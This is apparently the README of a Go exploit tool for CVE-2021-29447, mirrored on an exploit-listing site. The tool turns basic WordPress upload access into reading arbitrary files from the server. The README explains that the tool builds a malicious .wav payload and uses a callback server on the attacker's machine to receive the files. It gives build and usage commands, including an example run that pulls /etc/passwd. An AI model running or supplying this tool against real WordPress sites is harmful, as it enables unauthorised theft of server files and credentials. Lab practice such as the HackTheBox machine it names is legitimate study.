Share
## https://sploitus.com/exploit?id=7E1DE5B5-AA6B-573B-9EDF-DCF8C705A189
# exploit_cve-2021-29447

For educational purposes only.

This exploit is supposed to be really convenient tool to get any file from server running wordpress 5.6.2 and php8. (see https://wpscan.com/vulnerability/cbbe6c17-b24e-4be4-8937-c78472a138b5)

All you need is base wp-admin access and ability to upload a media file.

The exploit will generate a .wav file payload to upload using wp-admin.

Then it uses exploit's back server to give you eager file right on your console.

The perfect usage is HackTheBox's machine - metatwo https://www.hackthebox.com/machines/metatwo

![til](./preview.gif)

## Usage/Examples

```
$ go build

$ chmod +x exploit_cve-2021-29447

$ ./exploit_cve-2021-29447 --help                                               
Usage of ./exploit_cve-2021-29447:
  -local-server-ip string
        Use local server ip where a local server will be set
  -local-server-port int
        Use local server port to run local server on
  -o string
        Output file to save exploit's result
  -target-path string
        Use target path to point on file you want to get from target server

$ ./exploit_cve-2021-29447 -local-server-ip=<your ip address> -target-path=/etc/passwd

```